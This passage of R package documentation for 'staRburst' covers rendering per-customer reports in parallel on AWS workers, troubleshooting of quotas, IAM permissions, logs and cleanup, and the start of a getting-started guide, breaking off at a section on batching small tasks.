  customer_name = paste("Company", LETTERS[1:n_customers %% 26 + 1],
                       (1:n_customers %/% 26) + 1),
  stringsAsFactors = FALSE
)

head(customers)
```

## Report Generation Function

Define function to generate one report:

```{r render-fn, eval=FALSE}
generate_report <- function(customer_info) {
  customer_id <- customer_info$customer_id
  customer_name <- customer_info$customer_name

  # Generate data for this customer
  data <- generate_customer_data(as.numeric(gsub("CUST", "", customer_id)))

  # Output file path
  output_file <- sprintf("report_%s.html", customer_id)

  tryCatch({
    # Render report
    rmarkdown::render(
      input = "report_template.Rmd",
      output_file = output_file,
      params = list(
        customer_id = customer_id,
        customer_name = customer_name,
        month = "January 2026",
        data = data
      ),
      quiet = TRUE
    )

    list(
      customer_id = customer_id,
      success = TRUE,
      output_file = output_file,
      file_size = file.size(output_file),
      render_time = Sys.time()
    )
  }, error = function(e) {
    list(
      customer_id = customer_id,
      success = FALSE,
      error = as.character(e),
      render_time = Sys.time()
    )
  })
}
```

## Local Execution

Test with a few reports locally:

```{r local, eval=FALSE}
# Test with 5 reports
test_customers <- head(customers, 5)

cat(sprintf("Rendering %d reports locally...\n", nrow(test_customers)))
local_start <- Sys.time()

local_results <- lapply(
  split(test_customers, 1:nrow(test_customers)),
  generate_report
)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.1f seconds\n", local_time))
cat(sprintf("  Average: %.1f seconds per report\n", local_time / 5))
cat(sprintf("  Estimated time for %d reports: %.1f minutes\n\n",
            n_customers, (local_time / 5 * n_customers) / 60))
```

**Typical output**:
```
Rendering 5 reports locally...
✓ Completed in 23.4 seconds
  Average: 4.7 seconds per report
  Estimated time for 50 reports: 3.9 minutes
```

## Cloud Execution with staRburst

Render all reports in parallel:

```{r cloud, eval=FALSE}
cat(sprintf("Rendering %d reports on AWS...\n", n_customers))

# Convert data frame rows to list for starburst_map
customer_list <- split(customers, 1:nrow(customers))

results <- starburst_map(
  customer_list,
  generate_report,
  workers = 25,
  cpu = 2,
  memory = "4GB"
)
```

**Typical output**:
```
🚀 Starting starburst cluster with 25 workers
💰 Estimated cost: ~$2.00/hour
📊 Processing 50 items with 25 workers
📦 Created 25 chunks (avg 2 items per chunk)
🚀 Submitting tasks...
✓ Submitted 25 tasks
⏳ Progress: 25/25 tasks (0.4 minutes elapsed)

✓ Completed in 0.4 minutes
💰 Actual cost: $0.01
```

## Results Processing

Analyze the generation results:

```{r results, eval=FALSE}
# Check success rate
success_count <- sum(sapply(results, function(x) x$success))
failure_count <- sum(!sapply(results, function(x) x$success))

cat("\n=== Report Generation Summary ===\n\n")
cat(sprintf("Total reports: %d\n", length(results)))
cat(sprintf("Successfully generated: %d (%.1f%%)\n",
            success_count, (success_count / length(results)) * 100))
cat(sprintf("Failed: %d\n\n", failure_count))

# File size summary
successful_results <- results[sapply(results, function(x) x$success)]
file_sizes <- sapply(successful_results, function(x) x$file_size)

cat("File size statistics:\n")
cat(sprintf("  Total size: %.2f MB\n", sum(file_sizes) / 1024^2))
cat(sprintf("  Average size: %.1f KB\n", mean(file_sizes) / 1024))
cat(sprintf("  Range: %.1f - %.1f KB\n\n",
            min(file_sizes) / 1024, max(file_sizes) / 1024))

# Show sample of generated reports
cat("Generated reports:\n")
report_files <- sapply(successful_results[1:10], function(x) x$output_file)
print(report_files)
```

**Typical output**:
```
=== Report Generation Summary ===

Total reports: 50
Successfully generated: 50 (100.0%)
Failed: 0

File size statistics:
  Total size: 2.45 MB
  Average size: 50.2 KB
  Range: 45.3 - 55.8 KB

Generated reports:
 [1] "report_CUST001.html" "report_CUST002.html"
 [3] "report_CUST003.html" "report_CUST004.html"
 [5] "report_CUST005.html" "report_CUST006.html"
 [7] "report_CUST007.html" "report_CUST008.html"
 [9] "report_CUST009.html" "report_CUST010.html"
```

## Performance Comparison

| Method | Reports | Time | Cost | Speedup |
|--------|---------|------|------|---------|
| Local | 50 | 3.9 min | $0 | 1x |
| staRburst | 50 (10 workers) | 1.2 min | $0.004 | 3.3x |
| staRburst | 50 (25 workers) | 0.4 min | $0.01 | 9.8x |
| staRburst | 50 (50 workers) | 0.3 min | $0.02 | 13x |

**Key Insights**:
- Near-linear scaling with worker count
- Sweet spot: 25-50 workers for this workload
- Minimal cost ($0.01) for significant time savings
- Can easily scale to 500+ reports

## Advanced: Custom Report Distribution

Automatically distribute reports after generation:

```{r distribution, eval=FALSE}
generate_and_distribute <- function(customer_info) {
  # Generate report
  result <- generate_report(customer_info)

  if (result$success) {
    # Upload to S3 (example)
    tryCatch({
      # paws::s3()$put_object(
      #   Bucket = "my-reports-bucket",
      #   Key = sprintf("reports/2026-01/%s", result$output_file),
      #   Body = readBin(result$output_file, "raw",
      #                  file.size(result$output_file))
      # )

      result$uploaded <- TRUE
      result$s3_url <- sprintf("s3://my-reports-bucket/reports/2026-01/%s",
                              result$output_file)
    }, error = function(e) {
      result$uploaded <- FALSE
      result$upload_error <- as.character(e)
    })
  }

  result
}
```

## When to Use This Pattern

**Good fit**:
- Many independent reports (> 10)
- Report rendering takes > 30 seconds
- Time-sensitive delivery requirements
- CPU or I/O intensive rendering

**Not ideal**:
- Very simple reports (< 10 seconds to render)
- Reports with shared state or dependencies
- Interactive report generation
- Real-time reporting

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/reports.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/reports.R", package = "starburst"))
```

## Next Steps

- Use real customer data from database
- Add more complex visualizations
- Implement automated email distribution
- Create PDF reports instead of HTML
- Add report templating system
- Schedule monthly report generation

**Related examples**:
- [API Calls](example-api-calls.html) - Another I/O-bound parallel task
- [Feature Engineering](example-feature-engineering.html) - Data processing patterns

---
title: "Troubleshooting staRburst"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Troubleshooting staRburst}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

# Troubleshooting staRburst

This guide helps you diagnose and fix common issues with staRburst.

## Accessing Logs

### CloudWatch Logs Structure

staRburst automatically sends worker logs to CloudWatch Logs:

- **Log Group:** `/aws/ecs/starburst-worker`
- **Log Stream Pattern:** `starburst/<task-id>`
- **Retention:** 7 days (configurable)

### Viewing Logs in R

```r
# For ephemeral mode
library(starburst)
plan(starburst, workers = 10)

# Check logs for a specific task
# (get task ID from error messages or futures)

# For detached sessions
session <- starburst_session_attach("session-id")
status <- session$status()

# View failed task logs using AWS CLI or console
```

### Viewing Logs in AWS Console

1. Navigate to **CloudWatch → Log Groups**
2. Find `/aws/ecs/starburst-worker`
3. Search for task ID in stream names
4. Use CloudWatch Insights for advanced queries:

```
fields @timestamp, @message
| filter @message like /ERROR/
| sort @timestamp desc
| limit 100
```

## Common Issues

### Issue 1: Tasks Stuck in "Pending"

**Symptoms:**
- `session$status()` shows tasks never start
- Workers = 0 in status
- Tasks remain in pending state for >5 minutes

**Diagnosis:**

```r
# Check current configuration and quota
config <- starburst_status()
sts <- paws.security.identity::sts()
account <- sts$get_caller_identity()

# Check service quotas manually in AWS Console:
# Service Quotas → AWS Fargate → Fargate vCPUs
```

**Common Causes:**

1. **Insufficient vCPU quota** - Most common issue
   - Default Fargate quota: 6 vCPUs in us-east-1
   - Each worker uses configured CPU (default: 4 vCPUs)
   - With 10 workers × 4 vCPUs = 40 vCPUs needed

2. **Invalid task definition** - Wrong CPU/memory combination
   - Fargate has strict CPU/memory pairings
   - Example: 4 vCPUs supports 8-30 GB memory

3. **Network/subnet issues** - VPC configuration problems
   - Subnets must have available IP addresses
   - Security groups must allow outbound traffic

4. **IAM permission errors** - Missing ECS task execution role permissions
   - Must have ECR, S3, CloudWatch Logs access

**Solutions:**

```r
# Solution 1: Request quota increase
# Go to AWS Console → Service Quotas → AWS Fargate
# Request vCPUs quota increase to 100+

# Solution 2: Reduce workers
plan(starburst, workers = 1)  # Use only 1 worker (4 vCPUs)

# Solution 3: Reduce CPU per worker
plan(starburst, workers = 10, cpu = 0.25, memory = "512MB")

# Solution 4: Check IAM permissions
# Ensure ECS task execution role has:
# - AmazonECSTaskExecutionRolePolicy
# - S3 read/write access to starburst bucket
# - CloudWatch Logs write access
```

### Issue 2: Workers Crash Immediately

**Symptoms:**
- Tasks start but stop within 30 seconds
- Status shows workers = 0 after initial launch
- CloudWatch logs show error before exit

**Diagnosis:**

```r
# View CloudWatch logs for the failed task
# Look for error messages in the logs

# Common error patterns:
# - "Error: Cannot connect to S3" → S3 permissions
# - "Error loading package" → Package installation failed
# - "Cannot allocate memory" → Memory limit too low
# - "exec format error" → Architecture mismatch
```

**Common Causes:**

1. **S3 permission errors** - Task role can't access bucket
2. **Package installation failures** - Missing system dependencies
3. **Out of memory** - Memory limit too low for workload
4. **Architecture mismatch** - ARM64 vs X86_64 image/instance mismatch

**Solutions:**

```r
# Solution 1: Verify S3 permissions
# Check task role has S3 access:
# IAM → Roles → starburstECSTaskRole → Permissions
# Should have S3 GetObject/PutObject on bucket

# Solution 2: Increase memory
plan(starburst, workers = 5, cpu = 4, memory = "16GB")

# Solution 3: Check Docker build logs
# Re-run starburst setup to rebuild image
# Watch for package installation errors

# Solution 4: For EC2 mode, verify architecture matches
plan(starburst,
     launch_type = "EC2",
     instance_type = "c7g.xlarge")  # Graviton (ARM64)
# Ensure Docker image built for matching architecture
```

### Issue 3: "Access Denied" Errors

**Symptoms:**
- Error messages containing "AccessDenied" or "Forbidden"
- Can't create tasks, access S3, or push Docker images

**Diagnosis:**

```r
# Check which operation is failing:
# 1. Docker push → ECR permissions
# 2. S3 operations → S3 permissions
# 3. Task launch → ECS permissions

# Verify credentials
library(paws.security.identity)
sts <- paws.security.identity::sts()
identity <- sts$get_caller_identity()
print(identity)  # Should show your AWS account
```

**Common Causes:**

1. **No AWS credentials configured**
2. **IAM user lacks required permissions**
3. **S3 bucket policy blocks access**
4. **ECR repository doesn't exist or blocks access**

**Solutions:**

```r
# Solution 1: Configure AWS credentials
# Option A: Environment variables
Sys.setenv(
  AWS_ACCESS_KEY_ID = "YOUR_KEY",
  AWS_SECRET_ACCESS_KEY = "YOUR_SECRET",
  AWS_DEFAULT_REGION = "us-east-1"
)

# Option B: AWS CLI profile
Sys.setenv(AWS_PROFILE = "your-profile")

# Option C: IAM role (when running on EC2/ECS)
# No configuration needed - automatic

# Solution 2: Add required IAM permissions
# Your IAM user/role needs:
# - ECS: RunTask, DescribeTasks, StopTask
# - ECR: GetAuthorizationToken, BatchCheckLayerAvailability,
#        GetDownloadUrlForLayer, PutImage, InitiateLayerUpload, etc.
# - S3: GetObject, PutObject, ListBucket on your bucket
# - IAM: PassRole (to pass ECS task role)

# Solution 3: Run starburst_setup() to create all resources
# (the S3 bucket, ECR repo, ECS cluster, etc. are created and named for you)
library(starburst)
starburst_setup()
```

### Issue 4: High Costs / Runaway Workers

**Symptoms:**
- AWS bill higher than expected
- Many tasks running when you expected them to stop
- Old sessions still have active workers

**Diagnosis:**

```r
# List all active sessions
library(starburst)
sessions <- starburst_list_sessions()
print(sessions)

# Check for old sessions with running tasks
```

**Common Causes:**

1. **Forgot to cleanup session** - Workers keep running
2. **Requested too many workers** - Cost adds up quickly
3. **Long-running tasks** - Tasks running for hours/days

**Solutions:**

```r
# Solution 1: Cleanup all sessions
sessions <- starburst_list_sessions()
for (session_id in sessions$session_id) {
  session <- starburst_session_attach(session_id)
  session$cleanup(stop_workers = TRUE, force = TRUE)
}

# Solution 2: Set budget alerts in AWS
# AWS Billing Console → Budgets → Create budget
# Set alert at $100, $500 thresholds

# Solution 3: Use worker validation to prevent mistakes
# staRburst now enforces max 500 workers
# Previously you could accidentally request 10,000+

# Solution 4: Set absolute timeout on sessions
session <- starburst_session(
  workers = 10,
  absolute_timeout = 3600  # Auto-terminate after 1 hour
)
```

### Issue 5: Session Cleanup Not Working

**Symptoms:**
- Called `session$cleanup()` but workers still running
- S3 files not deleted
- Tasks still appearing in ECS console

**Diagnosis:**

```r
# Check if cleanup was called with correct parameters
session$cleanup(stop_workers = TRUE, force = TRUE)

# Verify tasks actually stopped (may take 30-60 seconds)
Sys.sleep(60)

# Check ECS tasks manually
library(paws.compute)
ecs <- paws.compute::ecs(config = list(region = "us-east-1"))
tasks <- ecs$list_tasks(cluster = "starburst-cluster")
print(tasks$taskArns)  # Should be empty or not include your tasks
```

**Common Causes:**

1. **Cleanup called without stop_workers** - Workers not stopped
2. **Cleanup called without force** - S3 files preserved
3. **Tasks in different cluster** - Cleanup looking in wrong place
4. **ECS eventual consistency** - Tasks take time to stop

**Solutions:**

```r
# Solution 1: Always use both flags for full cleanup
session$cleanup(stop_workers = TRUE, force = TRUE)

# Solution 2: Wait for ECS to process stop requests
session$cleanup(stop_workers = TRUE)
Sys.sleep(60)  # Wait 1 minute
# Then verify in AWS console

# Solution 3: Manual cleanup if needed
library(paws.compute)
library(paws.storage)

ecs <- paws.compute::ecs(config = list(region = "us-east-1"))
s3 <- paws.storage::s3(config = list(region = "us-east-1"))

# Stop all tasks in cluster
tasks <- ecs$list_tasks(cluster = "starburst-cluster", desiredStatus = "RUNNING")
for (task_arn in tasks$taskArns) {
  ecs$stop_task(cluster = "starburst-cluster", task = task_arn)
}

# Delete all session S3 files
result <- s3$list_objects_v2(Bucket = "your-bucket", Prefix = "sessions/")
# ... delete objects
```

### Issue 6: Results Not Appearing

**Symptoms:**
- `session$collect()` returns empty list
- Tasks show as "completed" but no results
- S3 doesn't contain result files

**Diagnosis:**

```r
# Check session status
status <- session$status()
print(status)

# Verify tasks were actually submitted
# Check S3 for task files
library(paws.storage)
s3 <- paws.storage::s3(config = list(region = "us-east-1"))
result <- s3$list_objects_v2(
  Bucket = "your-bucket",
  Prefix = sprintf("sessions/%s/results/", session$session_id)
)
print(result$Contents)  # Should show .qs files
```

**Common Causes:**

1. **Tasks failed before producing results** - Check for errors
2. **Workers can't write to S3** - Permission issue
3. **Looking at wrong session ID** - Attached to wrong session
4. **Results already collected** - Results only collected once

**Solutions:**

```r
# Solution 1: Check task status for errors
status <- session$status()
if (status$failed_tasks > 0) {
  # Check CloudWatch logs for failed task IDs
  # Look for error messages
}

# Solution 2: Verify S3 write permissions
# Task role must have S3 PutObject permission

# Solution 3: Verify session ID
print(session$session_id)
# Make sure this matches the session you created

# Solution 4: Results can only be collected once
# If you already called collect(), results are removed from S3
# You should store results after collection:
results <- session$collect(wait = TRUE)
saveRDS(results, "my_results.rds")  # Save locally
```

### Issue 7: Detached Session Reattach Fails

**Symptoms:**
- `starburst_session_attach()` throws error
- "Session not found" message
- Can't reconnect after closing R

**Diagnosis:**

```r
# List all sessions to find your session ID
sessions <- starburst_list_sessions()
print(sessions)

# Try to attach with exact session ID
session_id <- "session-abc123..."
session <- starburst_session_attach(session_id)
```

**Common Causes:**

1. **Wrong session ID** - Typo or wrong ID
2. **Session expired** - Exceeded absolute_timeout
3. **S3 manifest deleted** - Someone deleted session files
4. **Wrong region** - Session created in different region

**Solutions:**

```r
# Solution 1: List and copy exact session ID
sessions <- starburst_list_sessions()
session_id <- sessions$session_id[1]  # Use exact ID
session <- starburst_session_attach(session_id)

# Solution 2: Save session ID immediately after creation
session <- starburst_session(workers = 10)
session_id <- session$session_id
write(session_id, "my_session_id.txt")  # Save to file
# Later:
session_id <- readLines("my_session_id.txt")
session <- starburst_session_attach(session_id)

# Solution 3: Check correct region
session <- starburst_session_attach(session_id, region = "us-west-2")
```

### Issue 8: Package Installation Failures

**Symptoms:**
- Docker build fails during `renv::restore()`
- Error messages about missing system dependencies
- Specific packages fail to install

**Diagnosis:**

Look at Docker build output when running staRburst.
Common error patterns:

```
Error: installation of package 'X' had non-zero exit status
Error: compilation failed for package 'X'
Error: unable to load shared library
```

**Common Causes:**

1. **Missing system dependencies** - Package needs system libraries
2. **Package not in CRAN** - Private or development package
3. **Version conflicts** - renv.lock specifies unavailable version

**Solutions:**

```r
# Solution 1: Add system dependencies to Dockerfile.base
# Edit starburst package Dockerfile.base template:
# Add RUN apt-get install -y libcurl4-openssl-dev

# Solution 2: Use renv snapshot to capture dependencies
renv::snapshot()  # Updates renv.lock

# Solution 3: Install from GitHub for dev packages
renv::install("user/package")
renv::snapshot()

# Solution 4: Check package availability
install.packages("package")  # Test locally first
```

## Advanced Diagnostics

### Checking ECS Task Status

```r
library(paws.compute)
ecs <- paws.compute::ecs(config = list(region = "us-east-1"))

# List all tasks
tasks <- ecs$list_tasks(
  cluster = "starburst-cluster",
  desiredStatus = "RUNNING"
)

# Describe specific task
task_detail <- ecs$describe_tasks(
  cluster = "starburst-cluster",
  tasks = tasks$taskArns[1:1]
)

# Check exit code and reason
print(task_detail$tasks[[1]]$containers[[1]]$exitCode)
print(task_detail$tasks[[1]]$stoppedReason)
```

### Monitoring S3 Storage

```r
library(paws.storage)
s3 <- paws.storage::s3(config = list(region = "us-east-1"))

# List all session files
result <- s3$list_objects_v2(
  Bucket = "your-starburst-bucket",
  Prefix = "sessions/"
)

# Calculate total storage
total_bytes <- sum(sapply(result$Contents, function(x) x$Size))
total_mb <- total_bytes / 1024^2
cat(sprintf("Total storage: %.2f MB\n", total_mb))
```

### Estimating Costs

```r
# Fargate pricing (us-east-1, 2026):
# - vCPU: $0.04048 per hour
# - Memory: $0.004445 per GB-hour

vcpu_price <- 0.04048
memory_price <- 0.004445

workers <- 10
cpu <- 4
memory_gb <- 8
runtime_hours <- 1

cost_per_worker <- (cpu * vcpu_price) + (memory_gb * memory_price)
total_cost <- workers * cost_per_worker * runtime_hours

cat(sprintf("Estimated cost: $%.2f for %d hours\n", total_cost, runtime_hours))
```

## Getting Help

If you encounter issues not covered here:

1. **Check CloudWatch Logs** - Most issues have error messages in logs
2. **Review AWS Console** - Check ECS, S3, ECR for resource status
3. **File GitHub Issue** - Include error messages and logs
4. **AWS Support** - For quota increases or AWS-specific issues

**Information to Include in Bug Reports:**

- staRburst version: `packageVersion("starburst")`
- R version: `R.version.string`
- AWS region
- Launch type (Fargate vs EC2)
- Error messages from R and CloudWatch logs
- Session ID (for detached sessions)
- Output of `session$status()` (if applicable)

## See Also

- [Security Best Practices](security.html) - Securing your staRburst deployments
- [staRburst README](https://github.com/scttfrdmn/starburst) - Getting started guide
- [AWS Fargate Documentation](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/AWS_Fargate.html)

---
title: "Getting Started with staRburst"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Getting Started with staRburst}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r setup, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE
)
```

# Introduction

staRburst makes it trivial to scale your parallel R code from your laptop to 100+ AWS workers. This vignette walks through setup and common usage patterns.

## Which API should I use?

staRburst offers a few entry points. They share the same engine — pick the one that
fits how your code is written:

| Need | Use |
|------|-----|
| Map a function over inputs (simplest) | `starburst_map()` |
| Existing `future` / `furrr` code | `plan(starburst)` then `future_map()` |
| Long-running job that survives disconnects | `starburst_session()` |
| Explicit, reusable worker cluster | `starburst_cluster()` |
| Configure account/backend defaults | `starburst_config()` |

If you're new, start with `starburst_map()` — the next section walks through a
first job with it. If you already have `future`/`furrr` code, skip to
[Migrating existing future / furrr code](#migrating-existing-future-furrr-code);
the two styles are equivalent and shown side by side there.

### Which backend? EC2 (default) vs Fargate

Every API above runs on one of two compute backends, chosen with `launch_type`:

- **EC2 — the default and recommended choice.** Faster (no cold start), cheaper with
  Spot (the default), and more flexible (any instance type, warm pools).
  `starburst_setup()` provisions its capacity provider for you, so it works out of
  the box.
- **Fargate — an optional serverless alternative** (`launch_type = "FARGATE"`).
  Fully managed and needs **no** `starburst_setup_ec2` / capacity provider, but has
  cold-start latency and is bounded by your account's Fargate vCPU quota. Reach for
  it if you specifically want task-based serverless execution.

You don't have to choose up front — leave the default (EC2) and add
`launch_type = "FARGATE"` later if you want to compare.

## How it works (the mental model)

```
        Local R session
              |
              |  (1) serialize your function + inputs + detected globals (qs2)
              |      AWS credentials are read HERE, from your local environment
              v
   S3 bucket  +  staRburst control plane (ECS/ECR)
              |
              |  (2) launch workers: EC2 (default, Spot) or Fargate
              |      each worker's R packages come from your renv.lock, baked
              |      into a Docker image cached in ECR
              v
   Remote R workers  (one task per input element)
              |
              |  (3) each worker pulls a task from S3, runs it, writes the
              |      result + logs back to S3
              v
   Local R session  <-- results collected in order (starburst_map / cluster)
        or
   Detached-session store in S3  <-- collected later via starburst_session_attach()
```

**What to know from this picture:**

- **Credentials** are used only on your machine (to call AWS) and by the workers'
  IAM role — you never put keys in your code or in S3.
- **Uploaded** per task: your function, its inputs, and auto-detected globals — not
  your whole workspace. Large data should go to S3 yourself and be read on the worker.
- **Dependencies** come from your `renv.lock`, installed into the worker image once
  and cached in ECR (this is the first-run build cost).
- **After a failure or disconnect**, workers keep running against S3 until a
  timeout; nothing is silently lost. `session$cleanup()` (or normal completion of
  `starburst_map()`) tears down workers and removes the job's S3 objects.
- **Detached sessions** differ only in step 3's return path: results persist in S3
  so you can close R and collect later, instead of blocking the local session.

## Installation

```{r}
# Install from GitHub
remotes::install_github("scttfrdmn/starburst")
```

## One-Time Setup

Before using staRburst, you need to configure AWS resources. This only needs to be done once.

```{r}
library(starburst)

# Interactive setup wizard
starburst_setup()
```

This will:
- Validate your AWS credentials
- Create an S3 bucket for data transfer
- Create an ECR repository for Docker images
- Set up an ECS cluster and VPC resources
- Provision the **default EC2 capacity** (launch template + Auto Scaling Group +
  capacity provider for `c7g.xlarge`) so the default EC2 backend works immediately
  — created at zero instances, so no compute cost until you run a job
  (skip with `setup_ec2 = FALSE` if you only use Fargate)
- Check Fargate quotas and offer to request increases
- Build the initial worker image

Provisioning the AWS resources takes about **2 minutes**. On the **first run**,
staRburst also builds the worker Docker image, which adds **5–10 minutes** (it is
cached and reused afterwards, and you can skip it with
`starburst_setup(build_image = FALSE)` and build lazily on first job launch).

## Your first job

The simplest way to use staRburst is `starburst_map()` — hand it your inputs and a
function, and it runs the function over each input on AWS workers:

```{r}
library(starburst)

# Define your work
expensive_simulation <- function(i) {
  # Some computation that takes a few minutes
  results <- replicate(1000, {
    x <- rnorm(10000)
    mean(x^2)
  })
  mean(results)
}

# Run across 50 cloud workers (EC2 by default)
results <- starburst_map(1:100, expensive_simulation, workers = 50)
#> [Starting] Starting starburst cluster with 50 workers
#> [Status] Processing 100 items with 50 workers
#> [Starting] Submitting 100 tasks...
#> [Wait] Progress: 100/100 (128.0s)
#> [OK] Completed in 128.0 seconds
#> [Cost] Estimated cost: $0.85
```

That is the whole workflow: `starburst_setup()` once, then `starburst_map()` per
job. Everything below builds on this.

## Migrating existing `future` / `furrr` code {#migrating-existing-future-furrr-code}

If you already use `future` or `furrr`, you don't need `starburst_map()` — set the
plan to `starburst` and your existing `future_map()` / `future_lapply()` calls run
on AWS unchanged. The two styles are equivalent; use whichever matches your code:

```{r}
library(furrr)
library(starburst)

# Local baseline
plan(sequential)
results_local <- future_map(1:100, expensive_simulation)

# Same code, now on 50 cloud workers — just change the plan
plan(starburst, workers = 50)
results_cloud <- future_map(1:100, expensive_simulation)

# Results are identical to the local run
identical(results_local, results_cloud)
#> [1] TRUE
```

The two calls below do the same thing — pick the one that fits your codebase:

```{r}
# Direct API
results <- starburst_map(1:100, expensive_simulation, workers = 50)

# future / furrr
plan(starburst, workers = 50)
results <- future_map(1:100, expensive_simulation)
```

## Real-world examples

Rather than repeat toy snippets here, the article gallery carries complete,
**measured** end-to-end examples — each with real runtimes, costs, and the batching
choices that make (or break) a workload:

- [Monte Carlo simulation](https://starburst.ing/articles/example-monte-carlo.html)
  — many small simulations batched into a handful of tasks.
- [Bootstrap resampling](https://starburst.ing/articles/example-bootstrap.html)
  — resampling a shared dataset across workers.
- [Grid search](https://starburst.ing/articles/example-grid-search.html),
  [risk modeling](https://starburst.ing/articles/example-risk-modeling.html),
  [geospatial](https://starburst.ing/articles/example-geospatial.html), and
  [more](https://starburst.ing/articles/).

Before you size a job, read the two guides that report real numbers on when the cloud
wins, when it loses, and how to pick task/worker counts:
[Workload Shapes](https://starburst.ing/articles/workload-shapes.html) and
[Performance](https://starburst.ing/articles/performance.html). The short version:
each task should be real work (seconds or more), and thousands of tiny tasks should be
**batched** into dozens–hundreds — see [Batch Small Tasks](#batch-small-tasks) below.

## Working with Data

Base R's `read.csv()`/`readRDS()` cannot read `s3://` URLs — you need an S3 client
on the worker. A small helper keeps the examples below concrete and copy-pasteable
(the worker image already includes `paws.storage`):

```{r}
# Download an s3://bucket/key object to a temp file and read it on the worker.
read_s3 <- function(s3_uri, reader = readRDS) {
  m <- regmatches(s3_uri, regexec("^s3://([^/]+)/(.+)$", s3_uri))[[1]]
  bucket <- m[2]; key <- m[3]
  tmp <- tempfile()
  obj <- paws.storage::s3()$get_object(Bucket = bucket, Key = key)
  writeBin(obj$Body, tmp)
  reader(tmp)
}
```

### Data Already in S3

If your data is already in S3, workers can read it directly:

```{r}
plan(starburst, workers = 50)

results <- future_map(file_list, function(file) {
  # Each worker pulls its file from S3 (read_s3 defined above)
  data <- read_s3(sprintf("s3://my-bucket/%s", file), reader = read.csv)
  process(data)
})
```

### Uploading Local Data

For smaller datasets, you can pass data as arguments:

```{r}
# Load data locally
data <- read.csv("local_file.csv")

# staRburst automatically uploads to S3 and distributes
plan(starburst, workers = 50)

# `replicates` is your vector of inputs (e.g. bootstrap replicate ids)
results <- future_map(replicates, function(i) {
  # Each worker gets a copy of 'data'
  bootstrap_analysis(data, i)
})
```

### Large Data Optimization

For very large objects, upload once to S3 yourself and have each worker read it
from there, rather than serializing the object into every task:

```{r}
# Upload once from your machine
paws.storage::s3()$put_object(
  Bucket = "my-bucket", Key = "large_data.rds",
  Body = "huge_file.rds"
)
s3_path <- "s3://my-bucket/large_data.rds"

# Workers read from S3 inside the task (read_s3 helper defined above)
plan(starburst, workers = 100)

# `tasks` is your vector of work items
results <- future_map(tasks, function(i) {
  data <- read_s3(s3_path)   # readRDS by default
  process(data, i)
})
```

## Cost Management

### Estimate Costs

```{r}
# Check cost before running
plan(starburst, workers = 100, cpu = 4, memory = "8GB")
#> Estimated cost: ~$3.50/hour
```

### Set Cost Limits

```{r}
# Set an hourly cost ceiling (USD/hour) — jobs above this rate won't start
starburst_config(
  max_hourly_cost = 10,       # Don't start jobs estimated over $10/hour
  cost_alert_threshold = 5     # Warn at $5/hour
)

# Now jobs exceeding limit will error before starting
plan(starburst, workers = 1000)  # Would cost ~$35/hour
#> Error: Estimated cost ($35/hr) exceeds limit ($10/hr)
```

### Cost estimates

After a run, staRburst reports an **estimated** cost — the measured worker runtime
multiplied by the current AWS price for your instance type (On-Demand or Spot),
looked up live from the AWS Pricing API (and cached; it falls back to built-in rates
offline). It is a close estimate, not a figure from AWS billing / Cost Explorer.

```{r}
plan(starburst, workers = 50)

results <- future_map(data, process)

#> Cluster runtime: ~23 minutes
#> Estimated cost: ~$1.34
```

## Quota Management (Fargate backend)

> This section applies to the **Fargate** backend. On the default **EC2** backend,
> worker count is bounded by your normal EC2 On-Demand / Spot instance limits, not
> the Fargate vCPU quota below. If you stay on EC2 you can usually skip this.

### Check Your Quota

```{r}
starburst_quota_status()
#> Fargate vCPU Quota: 100 / 100 used
#> Allows: ~25 workers with 4 vCPUs each
#>
#> Recommended: Request increase to 500 vCPUs
```

### Request Quota Increase

```{r}
starburst_request_quota_increase(vcpus = 500)
#> Requesting Fargate vCPU quota increase:
#>   Current: 100 vCPUs
#>   Requested: 500 vCPUs
#>
#> [OK] Quota increase requested (Case ID: 12345678)
#> [OK] AWS typically approves within 1-24 hours
```

### Wave-Based Execution

If you request more workers than your quota allows, staRburst automatically uses wave-based execution:

```{r}
# Quota allows 25 workers, but you request 100
plan(starburst, workers = 100, cpu = 4)

#> [!] Requested: 100 workers (400 vCPUs)
#> [!] Current quota: 100 vCPUs (allows 25 workers max)
#>
#> [Plan] Execution plan:
#>   - Running in 4 waves of 25 workers each
#>
#> [TIP] Request quota increase to 500 vCPUs? [y/n]: y
#>
#> [OK] Quota increase requested
#> [Starting] Starting wave 1 (25 workers)...

results <- future_map(inputs, expensive_function)

#> [Wave] Wave 1: 100% complete (250 tasks)
#> [Wave] Wave 2: 100% complete (500 tasks)
#> [Wave] Wave 3: 100% complete (750 tasks)
#> [Wave] Wave 4: 100% complete (1000 tasks)
```

## Troubleshooting

### View Worker Logs

```{r}
# View logs from most recent cluster
starburst_logs()

# View logs from specific task
starburst_logs(task_id = "abc-123")

# View last 100 log lines
starburst_logs(last_n = 100)
```

### Check Cluster Status

```{r}
starburst_status()
#> Active Clusters:
#>   • starburst-xyz123: 50 workers running
#>   • starburst-abc456: 25 workers running
```

### Common Issues

**Environment mismatch**: Packages not found on workers

```{r}
# Rebuild environment
starburst_rebuild_environment()
```

**Task failures**: Some tasks failing

```{r}
# Check logs
starburst_logs(task_id = "failed-task-id")

# Often due to memory limits - increase worker memory
plan(starburst, workers = 50, memory = "16GB")  # Default is 8GB
```

**Slow data transfer**: Large objects taking too long

```{r}
# Use Arrow for data frames
library(arrow)
write_parquet(my_data, "s3://bucket/data.parquet")

# Workers read Arrow
results <- future_map(1:100, function(i) {
  data <- read_parquet("s3://bucket/data.parquet")
  process(data, i)
})
```

## Best Practices

### 1. Use for Right-Sized Workloads

✅ **Good**: Each task takes >5 minutes
```{r}
# 100 tasks, each takes 10 minutes
# Local: 1000 minutes, Cloud: ~10 minutes
```

❌ **Bad**: Each task takes <1 minute
```{r}
# 10000 tasks, each takes 30 seconds
# Startup overhead (45s) dominates
```

### 2. Batch Small Tasks

Instead of:
```{r}
